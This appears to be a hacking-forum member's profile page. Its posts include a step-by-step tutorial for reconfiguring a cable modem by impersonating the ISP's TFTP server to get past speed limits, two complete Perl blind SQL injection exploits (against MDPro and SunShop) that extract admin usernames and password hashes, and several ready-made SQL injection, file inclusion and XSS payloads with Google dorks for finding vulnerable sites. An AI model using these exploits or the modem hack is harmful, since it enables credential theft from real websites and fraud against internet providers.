
drgs

Members
  • Posts: 15


drgs's Achievements

Newbie (1/14)

Reputation: 10

  1. If it were the way these guys say, most young people would be in prison.
  2. Useful, thanks!
  3. Hack Your Modem And Increase Your Download Speed

     Hack Your Modem and Increase Your Download Speed from 64Kbps to any Speed You Wish

     Most of us will be feeling that the surfing speed which is allocated by our ISP is not enough. People with 64Kbps will think 128Kbps will be cool speed. People with 128Kbps will think 256Kbps will be cool and so on. This tutorial will teach you how to increase your 64Kbps link to 512Kbps or whatever speed you like. It is very much possible to do this, with a bit of luck, if your Cable Internet Service Provider is very uneducated on how this very new technology works and leaves some key loopholes open for you to grab vital information on how to accomplish this task. But this tutorial will not guarantee you 100% success.

     Okay here we go. I'm going to try to explain to you as best as I can how to accomplish re-configuring your SB5100, SB4100 or SB3100 cable modem.

     Theory of cable modem working

     All cable modems, when they boot up, will search for an "Image file" in which all configuration like your upload speed limit and download speed limit is defined. This "Image file" is stored in the ISP's TFTP server. The modem will be pre-configured with the ISP's TFTP server IP address and the Image file name to be downloaded. When the modem boots up it queries the TFTP server and downloads the Image file from it; according to this our speed limits will be set.

     Our Mission

     Get this Image file from the ISP's TFTP server, reconfigure it according to our need and force our modem to download this file from our computer rather than downloading it from our ISP's TFTP server.

     Steps to accomplish

     1). Get cable modem's MAC address
     2). Get your ISP's TFTP server IP address
     3). Get name and path of the "configuration file" or Image file stored in the ISP's TFTP server.
     4). Download Image file from ISP's TFTP server.
     5). Decrypt the Image file which you downloaded from ISP's TFTP server
     6). Modify the Image file
     7). Encrypt the modified Image file
     8). Change your computer's TCP configuration same as ISP's TFTP server (i.e. IP address same as ISP's TFTP server)
     9). Host TFTP server in your computer
     10). Put Image file in the base directory of your TFTP
     11). Restart your modem
     12). Change your PC's IP back as given by ISP
     13). OOPS Done. Start surfing with your new speed

     1). Get cable modem's MAC address

     You can either look at the back of the modem to get this MAC Address or you can log on to your cable modem with your Web Browser at hxxp://192.168.100.1/ . These are internal HTML pages stored within your DOCSIS cable modem (SB5100, SB4100 and SB3100) that give you even more vital information on configuration, unless it is turned off by your ISP. This feature might be totally turned off by your ISP.

     2). Get your ISP's TFTP server IP address
     3). Get name and path of the "configuration file" or Image file stored in the ISP's TFTP server.

     For getting this vital information you have to do an SNMP walk over your modem. For doing this you can use any one of the tools below:

     a) There's a program called QUERY.EXE from Weird Solutions which is a BOOTP packet request program that will tell you everything you need to know, without all these extra steps. It will display the Image Filename, TFTP server address, which is really all you need to get started. To use this BOOTP QUERY tool, you need the MAC address of your cable modem
     Or
     b) Experts can use Solarwinds SNMP program
     Or
     c) Beginners can use DOCSIS Diagnosis utility
     Or
     d) Beginners can use SNMPWALK Tool; use command "snmpwalk 192.168.100.1 public"

     NOTE: Use modem's IP address as "192.168.100.1" (SB5100, SB4100 and SB3100) when asked to provide it by any of the above tools. SNMP community is "Public".

     Using the above tools you will get the information of your ISP's TFTP server IP and the name of your "Image file" stored in that TFTP server. All your vital information is stored in this file, one of which is the MaxRateDown 2621440; MaxRateUp 393216;. (These were my ISP settings, which you can see are similar to what speed I was getting: 40KB/s up and 250 KB/s down.)

     Among these, the ones we need are:

     Configuration TFTP Server = 194.*.*..90 (replace this with yours throughout in the doc)
     Configuration filename = isrr.bin (replace this with yours throughout in the doc)

     And

     IP fragments created = 0
     IP address.10.xxx.xxx.xxx = 10.xxx.xxx.xxx
     IP address.192.168.100.1 = 192.168.100.1 (the IP address of the cable modem; replace this with yours throughout in the doc)
     IP-to-If-index.10.xxx.xxx.xxx = 2

     Suggestion: You can do this step by sniffing the modem i.e. "192.168.100.1" when the modem boots up. I never tried this method. Try your luck.

     4). Download Image file from ISP's TFTP server.

     For doing this go to your command prompt and use the below command without quotes and brackets.

     "C:\tftp -i <ISP's TFTP server IP> GET <Image filename> <local filename>"

     Okay now you got the Image file from your ISP's TFTP server.

     5). Decrypt the Image file which you downloaded from ISP's TFTP server
     6). Modify the Image file
     7). Encrypt the modified Image file

     Use the docsis tool which you can download from http://sourceforge.net/projects/docsis . Using this program you can decrypt the image file, change the upload speed and download speed, save it and encrypt it back. Rename this newly created file the same as your original image file.

     8). Change your computer's TCP configuration same as ISP's TFTP server (i.e. IP address same as ISP's TFTP server)

     Go to My Network Places and right click -> Properties. Select your LAN card, right click -> Properties -> Internet Protocol (TCP/IP), double click on it and change it to the following values. Configure your PC's TCP settings as below:

     IP: 194.*.*.90 (replace with the ISP's TFTP server)
     Netmask: 255.255.255.0
     Gateway: 192.168.100.1 (replace with your cable modem's IP address)

     Note: Gateway should be 192.168.100.1; only then can your modem communicate with the computer.

     9). Host TFTP server in your computer
     10). Put Image file in the base directory of your TFTP
     11). Restart your modem

     Download TFTP Server software and host a TFTP server in your computer. You can download a TFTP server from: ftp://ftp.ida.net/pub/wireless/tftpd32.exe

     Start TFTPD32 server. Go to Settings and set the Security to None. Increase the timeout to 20secs and the Max Retransmit to 6. Choose to translate UNIX filenames. Make sure its base directory points to where the isrr.bin is (i.e. the image file which you modified). If you need to replicate a directory pathname along with the image file, then make a directory from root that corresponds to the image file pathname.

     Restart your modem, and AS SOON as the SEND light goes solid, you should see a receive on your TFTP server i.e. your PC.

     12). Change your PC's IP back as given by ISP
     13). OOPS Done. Start surfing with your new speed

     Now you change the TCP settings of your PC back to normal as given by ISP (i.e. put your original IP address and gateway). Oops, you hacked your modem. Test it out by downloading some files using DAP (Download Accelerator Plus).

     Note: This speed will remain the same until you restart your cable modem. So each time you reboot your modem you have to follow steps 8, 9, 10, 11 and 12.

     Enjoy
  4. #!/usr/bin/perl
     use strict;
     use IO::Socket;

     my $app = "MDPro 1.0.76";
     my $type = "SQL Injection";
     my $author = "undefined1_";
     my $settings = "magic_quotes_runtime = off, mysql >= 4.1.0";
     $| = 1;

     print ":: $app $type - by $author ::\n\n\n";

     my $url = shift || usage();
     if($url =~ m/^(?:http:\/\/)(.*)/) { $url = $1; }
     if($url !~ m/^.*\/$/) { $url .= "/"; }

     get_md5s($url);
     print "don't forget to delete the referers from the admin interface...\n";

     sub get_md5s {
         my $url = shift;
         $url .= "index.php";
         my $admins_only = shift;
         my $ps = 0;
         my $referer = "Firefox ID=". randstring(20,25);
         my $uid_charset = "1234567890";
         my $user_charset = "abcdefghijklmnopqrstuvwxyz-_0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ][}{+=/\\'\"\@\$#!%^&*()";
         my $pass_charset = "afc0123456789abde";

         my $data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
         $data .= "Host: " . parse_host($url) . "\r\n";
         $data .= "Referer: $referer\r\n";
         $data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
         $data .= "Connection: close\r\n\r\n";
         my $recv = sendpacket(parse_host($url), parse_port($url), $data);
         $ps++;

         $data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
         $data .= "Host: " . parse_host($url) . "\r\n";
         $data .= "Referer: '\r\n";
         $data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
         $data .= "Connection: close\r\n\r\n";
         $recv = sendpacket(parse_host($url), parse_port($url), $data);
         $ps++;
         if($recv !~ m/Call to undefined function PN_DBMsgError/m) {
             print "magic quotes = on ;-[\n";
             return $ps;
         }

         my $recv;
         my $lastuid = 0;
         while(1) {
             my $uid_length = length("$lastuid");
             my $user_length = 1;
             my $pass_length = 32;
             my $uid = "";
             my $user = "";
             my $pass = "";
             my $O_RLY = 0;

             for(my $x = $uid_length; $x <= 8; $x++) {
                 print "\ruid length = $uid_length";
                 $data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
                 $data .= "Host: " . parse_host($url) . "\r\n";
                 $data .= "Referer: $referer' and (select 1 from md_group_membership where length(CONCAT(pn_uid))=$x and pn_uid>$lastuid and pn_gid=2 limit 1 order by pn_uid asc)=1 order by 1 asc/*\r\n";
                 $data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
                 $data .= "Connection: close\r\n\r\n";
                 $recv = sendpacket(parse_host($url), parse_port($url), $data);
                 $ps++;
                 if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
                     $uid_length = $x;
                     $x = 9;
                     $O_RLY = 1;
                 }
             }
             if($O_RLY == 0) { return $ps; }
             $O_RLY = 0;
             print "\ruid length = $uid_length\n";

             for(my $i = 1; $i <= $uid_length; $i++) {
                 for(my $j = 0; $j < length($uid_charset); $j++) {
                     my $key = substr($uid_charset, $j, 1);
                     my $hex_key = sprintf("0x%02x", ord($key));
                     print "\ruid = $uid$key";
                     $data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
                     $data .= "Host: " . parse_host($url) . "\r\n";
                     $data .= "Referer: $referer' and (select 1 from md_group_membership where substring(pn_uid,$i,1)=$hex_key and pn_uid>$lastuid and pn_gid=2 order by pn_uid asc limit 1)=1 order by 1 asc/*\r\n";
                     $data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
                     $data .= "Connection: close\r\n\r\n";
                     $recv = sendpacket(parse_host($url), parse_port($url), $data);
                     $ps++;
                     if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
                         $uid .= $key;
                         $j = length($uid_charset);
                     }
                 }
             }
             print "\ruid = $uid\n";

             for(my $x = $user_length; $x <= 25; $x++) {
                 print "\ruser length = $x";
                 $data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
                 $data .= "Host: " . parse_host($url) . "\r\n";
                 $data .= "Referer: $referer' and (select 1 from md_users where length(pn_uname)=$x and pn_uid=$uid limit 1)=1 order by 1 asc/*\r\n";
                 $data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
                 $data .= "Connection: close\r\n\r\n";
                 $recv = sendpacket(parse_host($url), parse_port($url), $data);
                 $ps++;
                 if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
                     $user_length = $x;
                     $x = 26;
                     $O_RLY = 1;
                 }
             }
             if($O_RLY == 0) { return $ps; }
             $O_RLY = 0;
             print "\ruser length = $user_length\n";

             for(my $i = 1; $i <= $user_length; $i++) {
                 for(my $j = 0; $j < length($user_charset); $j++) {
                     my $key = substr($user_charset, $j, 1);
                     my $hex_key = sprintf("0x%02x", ord($key));
                     print "\ruser = $user$key";
                     $data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
                     $data .= "Host: " . parse_host($url) . "\r\n";
                     $data .= "Referer: $referer' and (select 1 from md_users where substring(pn_uname,$i,1)=$hex_key and pn_uid=$uid limit 1)=1 order by 1 asc/*\r\n";
                     $data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
                     $data .= "Connection: close\r\n\r\n";
                     $recv = sendpacket(parse_host($url), parse_port($url), $data);
                     $ps++;
                     if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
                         $user .= $key;
                         $j = length($user_charset);
                     }
                 }
             }
             print "\ruser = $user\n";

             # for the password, do something like a tolower of the char directly in the SQL query
             for(my $i = 1; $i <= $pass_length; $i++) {
                 for(my $j = 0; $j < length($pass_charset); $j++) {
                     my $key = substr($pass_charset, $j, 1);
                     my $hex_key = sprintf("0x%02x", ord($key));
                     print "\rpassword = $pass$key";
                     $data = "GET " . parse_page($url) . " HTTP/1.1\r\n";
                     $data .= "Host: " . parse_host($url) . "\r\n";
                     $data .= "Referer: $referer' and (select 1 from md_users where lower(substring(pn_pass,$i,1))=$hex_key and pn_uid=$uid limit 1)=1 order by 1 asc/*\r\n";
                     $data .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
                     $data .= "Connection: close\r\n\r\n";
                     $recv = sendpacket(parse_host($url), parse_port($url), $data);
                     $ps++;
                     if($recv =~ m/Call to undefined function PN_DBMsgError/m) {
                         $pass .= $key;
                         $j = length($pass_charset);
                     }
                 }
             }
             print "\rpassword = $pass\n\n";
             exit;
         }
     }

     # ======================================================

     sub parse_host {
         my $url = shift;
         if($url =~ m/^([^\/:]+).*\//) { return $1; }
         return "127.0.0.1";
     }

     sub parse_port {
         my $url = shift;
         if($url =~ m/^(?:[^\/:]+)\d+)\//) { return $1; }
         return "80";
     }

     sub parse_page {
         my $url = shift;
         if($url =~ m/^(?:[^\/]+)(\/.*)/) { return $1; }
         return "/";
     }

     sub randstring(\$,\$) {
         my $min = shift;
         my $max = shift;
         my $length = int( (rand(65535)%($max-$min+1))+$min);
         my $ret = "";
         for(my $i = 0; $i < $length; $i++) {
             my $w = int(rand(3));
             if($w == 0) { $ret .= chr(97 + int(rand(26))); }
             elsif($w == 1) { $ret .= chr(65 + int(rand(26))); }
             else { $ret .= chr(48 + int(rand(10))); }
         }
         return $ret;
     }

     sub sendpacket {
         my $server = shift;
         my $port = shift;
         my $data = shift;
         my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port) or die ":: Could not connect to $server:80 $!\n";
         print $sock "$data";
         $data = "";
         my $resp;
         while($resp = <$sock>) { $data .= $resp; }
         close($sock);
         return $data;
     }

     sub usage() {
         printf "usage: %s <url>\n", $0;
         exit;
     }
  5. joomla com_gmaps 1.00 Remote SQL Injection
     Found: Cyber-Security
     Exploit: index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/
  6. *******************************************************************************
     # Title : Joomla Component NeoRecruit <= 1.4 (id) Remote Blind SQL Injection Vulnerability
     # Author : ajann
     # Contact :
     # S.Page : http://www.neojoomla.com/
     # $$ : 54,90 €
     # Dork : inurl:index.php?option=com_NeoRecruit
     # DorkEx : http://www.google.com.tr/search?hl=tr&q=inurl%3A%22index.php%3Foption%3Dcom_ponygallery%22&btnG=Ara&meta=lr%3D
     *******************************************************************************

     [[SQL]]---------------------------------------------------------
     http://[target]/[path]//index.php?option=com_neorecruit&task=offer_view&id=[SQL Inject]

     Example:
     //index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*
     [[/SQL]]
  7. #!/usr/bin/perl
     use LWP::UserAgent;
     use Getopt::Long;

     if(!$ARGV[1]) {
         print "\n \\#'#/ ";
         print "\n (-.-) ";
         print "\n -----------------oOO---(_)---OOo------------------";
         print "\n | SunShop v4.0 RC 6 (search) Blind SQL Injection |";
         print "\n | k1tk4t - Indonesia - newhack[dot]org |";
         print "\n | coded by DNX [dnx(at)hackermail.com] |";
         print "\n --------------------------------------------------";
         print "\n[!] Vendor: http://www.turnkeywebtools.com";
         print "\n[!] Bug: in the search script, u can inject sql code in the s[cid] parameter";
         print "\n[!] Solution: install v4.0.1";
         print "\n[!] Usage: perl sunshop.pl [Host] [Path] <Options>";
         print "\n[!] Example: perl sunshop.pl 127.0.0.1 /shop/ -i 1 -c 10 -o 1 -t ss_admins";
         print "\n[!] Options:";
         print "\n -i [no] Valid User-ID, default is 1";
         print "\n -c [no] Valid Category-ID with products, default is 1";
         print "\n -o [no] 1 = get username (default)";
         print "\n 2 = get password";
         print "\n -t [name] Changes the admin table name, default is admins";
         print "\n -p [ip:port] Proxy support";
         print "\n";
         exit;
     }

     my $host = $ARGV[0];
     my $path = $ARGV[1];
     my $user = 1;
     my $cat = 1;
     my $column = "username";
     my $table = "admins";
     my %options = ();
     GetOptions(\%options, "i=i", "c=i", "o=i", "t=s", "p=s");

     print "[!] Exploiting...\n";
     if($options{"i"}) { $user = $options{"i"}; }
     if($options{"c"}) { $cat = $options{"c"}; }
     if($options{"o"} && $options{"o"} == 2) { $column = "password"; }
     if($options{"t"}) { $table = $options{"t"}; }

     syswrite(STDOUT, "data:", 5);
     for(my $i = 1; $i <= 32; $i++) {
         my $found = 0;
         my $h = 48;
         while(!$found && $h <= 57) {
             if(istrue2($host, $path, $table, $user, $i, $h)) {
                 $found = 1;
                 syswrite(STDOUT, chr($h), 1);
             }
             $h++;
         }
         if(!$found) {
             $h = 97;
             while(!$found && $h <= 122) {
                 if(istrue2($host, $path, $table, $user, $i, $h)) {
                     $found = 1;
                     syswrite(STDOUT, chr($h), 1);
                 }
                 $h++;
             }
         }
     }
     print "\n[!] Exploit done\n";

     sub istrue2 {
         my $host = shift;
         my $path = shift;
         my $table = shift;
         my $uid = shift;
         my $i = shift;
         my $h = shift;
         my $ua = LWP::UserAgent->new;
         my $url = "http://".$host.$path."index.php?l=search_list&s[title]=Y&s[short_desc]=Y&s[full_desc]=Y&s[cid]=".$cat.")%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20WHERE%20id=".$uid."),".$i.",1)=CHAR(".$h.")/*";
         if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }
         my $response = $ua->get($url);
         my $content = $response->content;
         my $regexp = "Add To Cart";
         if($content =~ /$regexp/) { return 1; } else { return 0; }
     }
  8. Google dork: "Powered by AMCMS3"

     Remote File Inclusion
     ---------------------
     It is possible for a remote attacker to include a file from local or remote resources and/or execute arbitrary script code with the privileges of the webserver.

     Proof of Concept:
     index.php?loadpage=../../../../file
     index.php?loadpage=[evilscript]

     Solution: Edit the source code to ensure that input is properly validated. Where possible, it is recommended to make a list of accepted filenames and restrict the input to that list. For PHP, the option allow_url_fopen would normally allow a programmer to open, include or otherwise use a remote file using a URL rather than a local file path. It is recommended to disable this option in php.ini.

     SQL Injection
     -------------
     An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

     Proof of Concept:
     index.php?blockpage=%2E%2Findex%2Ephp%3Fblockpage%3D1%26cat%3D&cat=[SQL Injection]
     index.php?blockpage=%2E%2Findex%2Ephp%3Fblockpage%3D1%26cat%3D&cat='

     Solution: Your script should filter metacharacters from user input.

     Vendor was contacted by email and did not reply.
  9. #By KiNgOfThEwOrLd
     ---------------------------------------------------------------
     PoC
     D'u need an explanation?!? i don't think so
     ---------------------------------------------------------------
     SQL Injection
     http://[target]/[tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=%27

     Little examples
     Using user() and database() functions u can get some information about the database...as:
     http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*
     Or u can get some records from the database like:
     http://[target]/[tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]/**/from/**/[table_name]/*
     D'u want the tables n' the rows? Find it yourself ;P
     ---------------------------------------------------------------
     something else..
     Xss Vulnerability
     http://[target]/[tilde_path]/index.php?id=[id]&mode=yeardetail&aarstal=[XSS]
     ---------------------------------------------------------------
     Full Path Disclosure
     http://[target]/[tilde_path]/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on
     ---------------------------------------------------------------